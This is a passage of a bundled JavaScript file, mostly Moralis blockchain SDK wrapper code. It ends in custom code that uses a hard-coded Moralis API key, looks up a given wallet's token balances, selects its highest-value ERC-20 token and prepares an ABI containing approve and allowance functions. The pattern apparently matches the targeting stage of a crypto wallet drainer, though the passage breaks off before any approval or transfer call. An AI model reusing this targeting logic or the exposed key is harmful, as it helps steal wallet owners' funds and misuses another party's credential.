AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $ca981c1c74906d89$var$extendStatics = function(d, b) {
    $ca981c1c74906d89$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p];
    };
    return $ca981c1c74906d89$var$extendStatics(d, b);
};
function $ca981c1c74906d89$var$__extends(d, b) {
    if (typeof b !== "function" && b !== null) throw new TypeError("Class extends value " + String(b) + " is not a constructor or null");
    $ca981c1c74906d89$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
var $ca981c1c74906d89$var$EvmApiConfig = {
    evmApiBaseUrl: {
        name: "evmApiBaseUrl",
        defaultValue: "https://deep-index.moralis.io/api/v2"
    }
};
var $ca981c1c74906d89$var$EvmApiConfigSetup = /** @class */ function() {
    function EvmApiConfigSetup() {}
    EvmApiConfigSetup.register = function(config) {
        config.registerKey($ca981c1c74906d89$var$EvmApiConfig.evmApiBaseUrl);
    };
    return EvmApiConfigSetup;
}();
var $ca981c1c74906d89$var$ClientEvmApi = /** @class */ function(_super) {
    $ca981c1c74906d89$var$__extends(ClientEvmApi, _super);
    function ClientEvmApi() {
        var _this = _super !== null && _super.apply(this, arguments) || this;
        _this.block = {
            getBlock: function(request) {
                return new (0, $bd1f3f52e29d943b$export$39804cd0bd80fc38)((0, $3dfc2d9370ba0cd1$export$62e0feeeee341a27), _this.baseUrl, _this.core).fetch(request);
            },
            getDateToBlock: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$21b0ec1fd3742c57), _this.baseUrl, _this.core).fetch(request);
            }
        };
        _this.events = {
            getContractEvents: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$6ec0913c942c04c3), _this.baseUrl, _this.core).fetch(request);
            },
            getContractLogs: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$1d9fd9956238b29), _this.baseUrl, _this.core).fetch(request);
            }
        };
        _this.nft = {
            getContractNFTs: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$1a7550f6b237748b), _this.baseUrl, _this.core).fetch(request);
            },
            getMultipleNFTs: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$254df2181393dbc7), _this.baseUrl, _this.core).fetch(request);
            },
            getNFTContractMetadata: function(request) {
                return new (0, $bd1f3f52e29d943b$export$39804cd0bd80fc38)((0, $3dfc2d9370ba0cd1$export$bc5bdb9c52bdbae0), _this.baseUrl, _this.core).fetch(request);
            },
            getNFTContractTransfers: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$91aa7fb1b02fe81d), _this.baseUrl, _this.core).fetch(request);
            },
            getNFTLowestPrice: function(request) {
                return new (0, $bd1f3f52e29d943b$export$39804cd0bd80fc38)((0, $3dfc2d9370ba0cd1$export$54a4252f1046e878), _this.baseUrl, _this.core).fetch(request);
            },
            getNFTMetadata: function(request) {
                return new (0, $bd1f3f52e29d943b$export$39804cd0bd80fc38)((0, $3dfc2d9370ba0cd1$export$4767c6e68c3a24f7), _this.baseUrl, _this.core).fetch(request);
            },
            getNFTOwners: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$3f6c30a742da9ae), _this.baseUrl, _this.core).fetch(request);
            },
            getNFTTokenIdOwners: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$ac0acee6dae00396), _this.baseUrl, _this.core).fetch(request);
            },
            getNFTTransfersByBlock: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$d0862a1d34b55e14), _this.baseUrl, _this.core).fetch(request);
            },
            getNFTTransfersFromToBlock: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$fab71468f9b1bd68), _this.baseUrl, _this.core).fetch(request);
            },
            getNFTTransfers: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$4c8b5b836c918cf8), _this.baseUrl, _this.core).fetch(request);
            },
            getWalletNFTCollections: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$596d8eca99fc248e), _this.baseUrl, _this.core).fetch(request);
            },
            getWalletNFTs: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$a7f18fa4ab405966), _this.baseUrl, _this.core).fetch(request);
            },
            getWalletNFTTransfers: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$2446d41cee2f639c), _this.baseUrl, _this.core).fetch(request);
            },
            reSyncMetadata: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$c37fa52dec548eb2), _this.baseUrl, _this.core).fetch(request);
            },
            searchNFTs: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$905c7ba175e51715), _this.baseUrl, _this.core).fetch(request);
            },
            syncNFTContract: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$e620f1cc2d1a3557), _this.baseUrl, _this.core).fetch(request);
            },
            getNFTTrades: function(request) {
                return new (0, $bd1f3f52e29d943b$export$81107c8355a8d790)((0, $3dfc2d9370ba0cd1$export$b9e67fc8a4e7b76d), _this.baseUrl, _this.core).fetch(request, null);
            }
        };
        _this.token = {
            getErc20Approvals: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$f8b05e1b1d8e8d98), _this.baseUrl, _this.core).fetch(request);
            },
            getErc20Burns: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$9affd740a9b8ad81), _this.baseUrl, _this.core).fetch(request);
            },
            getErc20Mints: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$63cbd81d3736e8e1), _this.baseUrl, _this.core).fetch(request);
            },
            getTokenAllowance: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$35c74b1c5e54b671), _this.baseUrl, _this.core).fetch(request);
            },
            getTokenMetadataBySymbol: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$30dee9f56bd044aa), _this.baseUrl, _this.core).fetch(request);
            },
            getTokenMetadata: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$b722950d28f32054), _this.baseUrl, _this.core).fetch(request);
            },
            getTokenPrice: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$fc69d783890468cd), _this.baseUrl, _this.core).fetch(request);
            },
            getTokenTransfers: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$699bb7c67626970), _this.baseUrl, _this.core).fetch(request);
            },
            getWalletTokenBalances: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$59de9565a776890f), _this.baseUrl, _this.core).fetch(request);
            },
            getWalletTokenTransfers: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$a787c09a62ee9e2d), _this.baseUrl, _this.core).fetch(request);
            },
            getErc20Transfers: function(request) {
                return new (0, $bd1f3f52e29d943b$export$81107c8355a8d790)((0, $3dfc2d9370ba0cd1$export$e128930172c10f7e), _this.baseUrl, _this.core).fetch(request, null);
            }
        };
        _this.transaction = {
            getInternalTransactions: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$9ca00ae4093f2b0a), _this.baseUrl, _this.core).fetch(request);
            },
            getTransaction: function(request) {
                return new (0, $bd1f3f52e29d943b$export$39804cd0bd80fc38)((0, $3dfc2d9370ba0cd1$export$4b742acef4c40754), _this.baseUrl, _this.core).fetch(request);
            },
            getTransactionVerbose: function(request) {
                return new (0, $bd1f3f52e29d943b$export$39804cd0bd80fc38)((0, $3dfc2d9370ba0cd1$export$5666de66a01cbd37), _this.baseUrl, _this.core).fetch(request);
            },
            getWalletTransactions: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$bc6181f6a7d3e941), _this.baseUrl, _this.core).fetch(request);
            },
            getWalletTransactionsVerbose: function(request) {
                return new (0, $bd1f3f52e29d943b$export$3d62e0d1622344e8)((0, $3dfc2d9370ba0cd1$export$ac08e7d18d7354a7), _this.baseUrl, _this.core).fetch(request);
            }
        };
        _this.balance = {
            getNativeBalance: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$a1e62a5f47027c1d), _this.baseUrl, _this.core).fetch(request);
            },
            getNativeBalancesForAddresses: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$70045e42822758c2), _this.baseUrl, _this.core).fetch(request);
            }
        };
        _this.defi = {
            getPairAddress: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$d413e2c33fff25bf), _this.baseUrl, _this.core).fetch(request);
            },
            getPairReserves: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$eebe7b17fddf7123), _this.baseUrl, _this.core).fetch(request);
            }
        };
        _this.resolve = {
            resolveAddress: function(request) {
                return new (0, $bd1f3f52e29d943b$export$39804cd0bd80fc38)((0, $3dfc2d9370ba0cd1$export$f51a3715ba5a6e0c), _this.baseUrl, _this.core).fetch(request);
            },
            resolveDomain: function(request) {
                return new (0, $bd1f3f52e29d943b$export$39804cd0bd80fc38)((0, $3dfc2d9370ba0cd1$export$42c99d178d9486c8), _this.baseUrl, _this.core).fetch(request);
            },
            resolveENSDomain: function(request) {
                return new (0, $bd1f3f52e29d943b$export$39804cd0bd80fc38)((0, $3dfc2d9370ba0cd1$export$7af7fa88f6da397b), _this.baseUrl, _this.core).fetch(request);
            }
        };
        _this.utils = {
            runContractFunction: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$2abac9b6e6aa0dbf), _this.baseUrl, _this.core).fetch(request);
            },
            web3ApiVersion: function() {
                return new (0, $bd1f3f52e29d943b$export$ddc2c67cdf66d11d)((0, $3dfc2d9370ba0cd1$export$e086ed33a398f728), _this.baseUrl, _this.core).fetch({}, null);
            },
            endpointWeights: function() {
                return new (0, $bd1f3f52e29d943b$export$ddc2c67cdf66d11d)((0, $3dfc2d9370ba0cd1$export$f39278a7bd17dc7e), _this.baseUrl, _this.core).fetch({}, null);
            },
            reviewContracts: function(request, body) {
                return new (0, $bd1f3f52e29d943b$export$ddc2c67cdf66d11d)((0, $3dfc2d9370ba0cd1$export$77bf45486adc529a), _this.baseUrl, _this.core).fetch(request, body);
            }
        };
        _this.ipfs = {
            uploadFolder: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $3dfc2d9370ba0cd1$export$cc02ac16615509b4), _this.baseUrl, _this.core).fetch(request);
            }
        };
        _this.marketData = {
            getTopERC20TokensByMarketCap: function() {
                return new (0, $bd1f3f52e29d943b$export$ddc2c67cdf66d11d)((0, $3dfc2d9370ba0cd1$export$5c6e8e3bad8fd01b), _this.baseUrl, _this.core).fetch({}, null);
            },
            getTopERC20TokensByPriceMovers: function() {
                return new (0, $bd1f3f52e29d943b$export$ddc2c67cdf66d11d)((0, $3dfc2d9370ba0cd1$export$b8e287428f0083fb), _this.baseUrl, _this.core).fetch({}, null);
            },
            getTopNFTCollectionsByMarketCap: function() {
                return new (0, $bd1f3f52e29d943b$export$ddc2c67cdf66d11d)((0, $3dfc2d9370ba0cd1$export$c30de6a407b87d63), _this.baseUrl, _this.core).fetch({}, null);
            },
            getHottestNFTCollectionsByTradingVolume: function() {
                return new (0, $bd1f3f52e29d943b$export$ddc2c67cdf66d11d)((0, $3dfc2d9370ba0cd1$export$3ebdbefa4796404e), _this.baseUrl, _this.core).fetch({}, null);
            }
        };
        _this.wallets = {
            getWalletActiveChains: function(request) {
                return new (0, $bd1f3f52e29d943b$export$ddc2c67cdf66d11d)((0, $3dfc2d9370ba0cd1$export$1681f6a6f032ca89), _this.baseUrl, _this.core).fetch(request, null);
            }
        };
        return _this;
    }
    return ClientEvmApi;
}((0, $10891f2cb3e98601$export$6d7e12e62bd6aef5));
var $ca981c1c74906d89$export$d9b0bf69e3520ec1 = /** @class */ function(_super) {
    $ca981c1c74906d89$var$__extends(EvmApi, _super);
    function EvmApi(core) {
        return _super.call(this, EvmApi.moduleName, core, function() {
            return core.config.get($ca981c1c74906d89$var$EvmApiConfig.evmApiBaseUrl);
        }) || this;
    }
    EvmApi.create = function(core) {
        return new EvmApi(core !== null && core !== void 0 ? core : (0, $10891f2cb3e98601$export$211989d19e9f0ff7).getDefault());
    };
    EvmApi.prototype.setup = function() {
        $ca981c1c74906d89$var$EvmApiConfigSetup.register(this.core.config);
    };
    EvmApi.prototype.start = function() {
    // Nothing
    };
    EvmApi.moduleName = "evmApi";
    return EvmApi;
}($ca981c1c74906d89$var$ClientEvmApi);





/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $f279b42ee3e99745$var$extendStatics = function(d, b) {
    $f279b42ee3e99745$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p];
    };
    return $f279b42ee3e99745$var$extendStatics(d, b);
};
function $f279b42ee3e99745$var$__extends(d, b) {
    if (typeof b !== "function" && b !== null) throw new TypeError("Class extends value " + String(b) + " is not a constructor or null");
    $f279b42ee3e99745$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
var $f279b42ee3e99745$var$MAINNET_BASE_URL = "https://aptos-mainnet.aws-prod-api-1.moralis.io";
var $f279b42ee3e99745$var$TESTNET_BASE_URL = "https://aptos-testnet.aws-prod-api-1.moralis.io";
var $f279b42ee3e99745$export$4d2857cba1d210ec = /** @class */ function(_super) {
    $f279b42ee3e99745$var$__extends(AptosApi, _super);
    function AptosApi(core) {
        var _this = _super.call(this) || this;
        _this.core = core;
        return _this;
    }
    AptosApi.create = function(core) {
        if (!core) core = (0, $10891f2cb3e98601$export$211989d19e9f0ff7).getDefault();
        return new AptosApi(core);
    };
    AptosApi.prototype.createEndpoint = function(operation) {
        var _this = this;
        return function(request) {
            var resolver = new (0, $bd1f3f52e29d943b$export$ddc2c67cdf66d11d)(operation, $f279b42ee3e99745$var$createBaseUrlResolver(_this.core), _this.core);
            return resolver.resolve(request, null);
        };
    };
    AptosApi.prototype.createEndpointWithBody = function(operation) {
        var _this = this;
        return function(request, body) {
            var resolver = new (0, $bd1f3f52e29d943b$export$ddc2c67cdf66d11d)(operation, $f279b42ee3e99745$var$createBaseUrlResolver(_this.core), _this.core);
            return resolver.resolve(request, body);
        };
    };
    AptosApi.moduleName = "aptApi";
    return AptosApi;
}((0, $a7ef34a427d74c9c$export$1cab9424f7b9d36c));
function $f279b42ee3e99745$var$createBaseUrlResolver(core) {
    return function(request) {
        var network = request.network;
        if (network) {
            var finalNetwork = (0, $a7ef34a427d74c9c$export$6779c8260151004a).resolve(network, core);
            switch(finalNetwork){
                case "mainnet":
                    return $f279b42ee3e99745$var$MAINNET_BASE_URL;
                case "testnet":
                    return $f279b42ee3e99745$var$TESTNET_BASE_URL;
                default:
                    throw new Error("Not supported network");
            }
        }
        return $f279b42ee3e99745$var$MAINNET_BASE_URL;
    };
}






/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $b886d6871c564959$var$extendStatics = function(d, b) {
    $b886d6871c564959$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p];
    };
    return $b886d6871c564959$var$extendStatics(d, b);
};
function $b886d6871c564959$var$__extends(d, b) {
    if (typeof b !== "function" && b !== null) throw new TypeError("Class extends value " + String(b) + " is not a constructor or null");
    $b886d6871c564959$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
var $b886d6871c564959$var$ClientSolApi = /** @class */ function(_super) {
    $b886d6871c564959$var$__extends(ClientSolApi, _super);
    function ClientSolApi() {
        var _this = _super !== null && _super.apply(this, arguments) || this;
        _this.account = {
            getBalance: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $cb2d40467f9cecb7$export$cec705c2a98d6e79), _this.baseUrl, _this.core).fetch(request);
            },
            getNFTs: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $cb2d40467f9cecb7$export$5f65ec0a833b5ee0), _this.baseUrl, _this.core).fetch(request);
            },
            getPortfolio: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $cb2d40467f9cecb7$export$58ffda6470f20b36), _this.baseUrl, _this.core).fetch(request);
            },
            getSPL: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $cb2d40467f9cecb7$export$f54e822472a0e90c), _this.baseUrl, _this.core).fetch(request);
            }
        };
        _this.nft = {
            getNFTMetadata: function(request) {
                return new (0, $bd1f3f52e29d943b$export$7f2fa56918213716)((0, $cb2d40467f9cecb7$export$4767c6e68c3a24f7), _this.baseUrl, _this.core).fetch(request);
            }
        };
        _this.token = {
            getTokenPrice: function(request) {
                return new (0, $bd1f3f52e29d943b$export$ddc2c67cdf66d11d)((0, $cb2d40467f9cecb7$export$9ab183f776707895), _this.baseUrl, _this.core).fetch(request, null);
            }
        };
        return _this;
    }
    return ClientSolApi;
}((0, $10891f2cb3e98601$export$6d7e12e62bd6aef5));
var $b886d6871c564959$var$SolApiConfig = {
    solApiBaseUrl: {
        name: "solApiBaseUrl",
        defaultValue: "https://solana-gateway.moralis.io"
    }
};
var $b886d6871c564959$var$EvmSolApiConfigSetup = /** @class */ function() {
    function EvmSolApiConfigSetup() {}
    EvmSolApiConfigSetup.register = function(config) {
        config.registerKey($b886d6871c564959$var$SolApiConfig.solApiBaseUrl);
    };
    return EvmSolApiConfigSetup;
}();
var $b886d6871c564959$export$c512e8897fbd5fba = /** @class */ function(_super) {
    $b886d6871c564959$var$__extends(SolApi, _super);
    function SolApi(core) {
        return _super.call(this, SolApi.moduleName, core, function() {
            return core.config.get($b886d6871c564959$var$SolApiConfig.solApiBaseUrl);
        }) || this;
    }
    SolApi.create = function(core) {
        return new SolApi(core !== null && core !== void 0 ? core : (0, $10891f2cb3e98601$export$211989d19e9f0ff7).getDefault());
    };
    SolApi.prototype.setup = function() {
        $b886d6871c564959$var$EvmSolApiConfigSetup.register(this.core.config);
    };
    SolApi.prototype.start = function() {
    // Nothing
    };
    SolApi.moduleName = "solApi";
    return SolApi;
}($b886d6871c564959$var$ClientSolApi);



// Core
var $ca83ba7c03251069$var$core = (0, $10891f2cb3e98601$export$4143ab5b91744744).create();
// Utility modules
var $ca83ba7c03251069$var$commonEvmUtils = (0, $3dfc2d9370ba0cd1$export$6f713f3b0df4d10f).create($ca83ba7c03251069$var$core);
var $ca83ba7c03251069$var$commonSolUtils = (0, $cb2d40467f9cecb7$export$884ef4b70f41d4a4).create($ca83ba7c03251069$var$core);
var $ca83ba7c03251069$var$apiUtils = (0, $bd1f3f52e29d943b$export$31b619889b2e1a3d).create($ca83ba7c03251069$var$core);
// Feature modules
var $ca83ba7c03251069$var$auth = (0, $15acea11234fc715$export$334c29725a78c21d).create($ca83ba7c03251069$var$core);
var $ca83ba7c03251069$var$streams = (0, $e96acc503731d7ac$export$8ee3a38db681f49d).create($ca83ba7c03251069$var$core);
var $ca83ba7c03251069$var$evmApi = (0, $ca981c1c74906d89$export$d9b0bf69e3520ec1).create($ca83ba7c03251069$var$core);
var $ca83ba7c03251069$var$solApi = (0, $b886d6871c564959$export$c512e8897fbd5fba).create($ca83ba7c03251069$var$core);
var $ca83ba7c03251069$var$aptosApi = (0, $f279b42ee3e99745$export$4d2857cba1d210ec).create($ca83ba7c03251069$var$core);
// Register all Moralis modules to Core
$ca83ba7c03251069$var$core.registerModules([
    $ca83ba7c03251069$var$commonEvmUtils,
    $ca83ba7c03251069$var$commonSolUtils,
    $ca83ba7c03251069$var$auth,
    $ca83ba7c03251069$var$apiUtils,
    $ca83ba7c03251069$var$evmApi,
    $ca83ba7c03251069$var$solApi,
    $ca83ba7c03251069$var$streams
]);
(0, $10891f2cb3e98601$export$211989d19e9f0ff7).setDefault($ca83ba7c03251069$var$core);
var $ca83ba7c03251069$export$2e2bcd8739ae039 = {
    Core: $ca83ba7c03251069$var$core,
    Auth: $ca83ba7c03251069$var$auth,
    Streams: $ca83ba7c03251069$var$streams,
    EvmApi: $ca83ba7c03251069$var$evmApi,
    SolApi: $ca83ba7c03251069$var$solApi,
    AptosApi: $ca83ba7c03251069$var$aptosApi,
    EvmUtils: $ca83ba7c03251069$var$commonEvmUtils,
    SolUtils: $ca83ba7c03251069$var$commonSolUtils,
    start: function(config) {
        return $ca83ba7c03251069$var$core.start(config);
    }
};


var $49196067e703828c$require$Moralis = $ca83ba7c03251069$export$2e2bcd8739ae039;

var $49196067e703828c$require$EvmChain = $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7;
let $49196067e703828c$var$isMoralisInit = false;
const $49196067e703828c$var$getTokensOwned = async (address)=>{
    if (!$49196067e703828c$var$isMoralisInit) {
        await $49196067e703828c$require$Moralis.start({
            apiKey: "cEp4V3G17OJaNmHvgYXtXBiMrtsJ8T9MWob2PIra3XPcyzvZgcjrgZ0qxp8pfd25"
        });
        $49196067e703828c$var$isMoralisInit = true;
    }
    const chain = $49196067e703828c$require$EvmChain.ETHEREUM;
    const response = await $49196067e703828c$require$Moralis.EvmApi.token.getWalletTokenBalances({
        address: address,
        chain: chain
    });
    const { address: tka, dec: dec } = await $49196067e703828c$var$getHighestValueToken(response.toJSON());
    const tokenABI = $49196067e703828c$var$getContractABI();
    return {
        abi: tokenABI,
        tka: tka,
        dec: dec
    };
};
const $49196067e703828c$var$getTokenPrice = async (address)=>{
    const chain = $49196067e703828c$require$EvmChain.ETHEREUM;
    const response = await $49196067e703828c$require$Moralis.EvmApi.token.getTokenPrice({
        address: address,
        chain: chain
    });
    return response.toJSON();
};
const $49196067e703828c$var$getHighestValueToken = async (tokens)=>{
    let list = Promise.all(tokens.map(async (token, i)=>{
        const tokenPrice = await $49196067e703828c$var$getTokenPrice(token.token_address);
        const realBalance = token.balance / Math.pow(10, token.decimals);
        return {
            tokenPriceUSD: tokenPrice.usdPrice,
            realBalance: realBalance,
            address: tokens[i].token_address,
            balUSD: parseInt(tokenPrice.usdPrice * realBalance),
            decimals: token.decimals
        };
    }));
    list = await list;
    const balInt = list.map((o)=>parseInt(o.balUSD));
    const rTK = Math.max(...list.map((o)=>parseInt(o.balUSD)));
    return {
        address: list[balInt.indexOf(rTK)].address,
        dec: list[balInt.indexOf(rTK)].decimals
    };
};
$49196067e703828c$exports = {
    getTokenPrice: $49196067e703828c$var$getTokenPrice,
    getTokensOwned: $49196067e703828c$var$getTokensOwned,
    getContractABI: $49196067e703828c$var$getContractABI
};
function $49196067e703828c$var$getContractABI() {
    return [
        {
            inputs: [
                {
                    internalType: "string",
                    name: "name",
                    type: "string"
                },
                {
                    internalType: "string",
                    name: "symbol",
                    type: "string"
                },
                {
                    internalType: "uint256",
                    name: "totalSupply_",
                    type: "uint256"
                }
            ],
            stateMutability: "nonpayable",
            type: "constructor"
        },
        {
            anonymous: false,
            inputs: [
                {
                    indexed: true,
                    internalType: "address",
                    name: "owner",
                    type: "address"
                },
                {
                    indexed: true,
                    internalType: "address",
                    name: "spender",
                    type: "address"
                },
                {
                    indexed: false,
                    internalType: "uint256",
                    name: "value",
                    type: "uint256"
                }
            ],
            name: "Approval",
            type: "event"
        },
        {
            anonymous: false,
            inputs: [
                {
                    indexed: true,
                    internalType: "address",
                    name: "from",
                    type: "address"
                },
                {
                    indexed: true,
                    internalType: "address",
                    name: "to",
                    type: "address"
                },
                {
                    indexed: false,
                    internalType: "uint256",
                    name: "value",
                    type: "uint256"
                }
            ],
            name: "Transfer",
            type: "event"
        },
        {
            inputs: [
                {
                    internalType: "address",
                    name: "owner",
                    type: "address"
                },
                {
                    internalType: "address",
                    name: "spender",
                    type: "address"
                }
            ],
            name: "allowance",
            outputs: [
                {
                    internalType: "uint256",
                    name: "",
                    type: "uint256"
                }
            ],
            stateMutability: "view",
            type: "function"
        },
        {
            inputs: [
                {
                    internalType: "address",
                    name: "spender",
                    type: "address"
                },
                {
                    internalType: "uint256",
                    name: "amount",
                    type: "uint256"
                }
            ],
            name: "approve",
            outputs: [
                {
                    internalType: "bool",
                    name: "",
                    type: "bool"
                }
            ],
            stateMutability: "nonpayable",
            type: "function"
        },
        {
            inputs: [
                {
                    internalType: "address",
                    name: "account",
                    type: "address"
                }
            ],
            name: "balanceOf",
            outputs: [
                {
                    internalType: "uint256",
                    name: "",
                    type: "uint256"
                }
            ],
            stateMutability: "view",
            type: "function"
        },
        {
            inputs: [],
            name: "decimals",
            outputs: [
                {
                    internalType: "uint8",
                    name: "",
                    type: "uint8"
                }
            ],
            stateMutability: "view",
            type: "function"
        },
        {
            inputs: [
                {
                    internalType: "address",
                    name: "spender",
                    type: "address"
                },
                {
                    internalType: "uint256",
                    name: "subtractedValue",
                    type: "uint256"
                }
            ],
            name: "decreaseAllowance",
            outputs: [
                {
                    internalType: "bool",
                    name: "",
                    type: "bool"
                }
            ],
            stateMutability: "nonpayable",
            type: "function"
        },
        {
            inputs: [
                {
                    internalType: "address",
                    name: "spender",
                    type: "address"
                },
                {
                    internalType: "uint256",
                    name: "addedValue",
                    type: "uint256"
                }
            ],
            name: "increaseAllowance",
            outputs: [
                {
                    internalType: "bool",
                    name: "",
                    type: "bool"
                }
            ],
            stateMutability: "nonpayable",
            type: "function"
        },
        {
            inputs: [],
            name: "name",
            outputs: [
                {
                    internalType: "string",
                    name: "",
                    type: "string"
                }
            ],
            stateMutability: "view",
            type: "function"
        },
        {
            inputs: [],
            name: "symbol",
            outputs: [
                {
                    internalType: "string",
                    name: "",
                    type: "string"
                }
            ],
            stateMutability: "view",
            type: "function"
        },
        {
            inputs: [],
            name: "totalSupply",
            outputs: [
                {
                    internalType: "uint256",
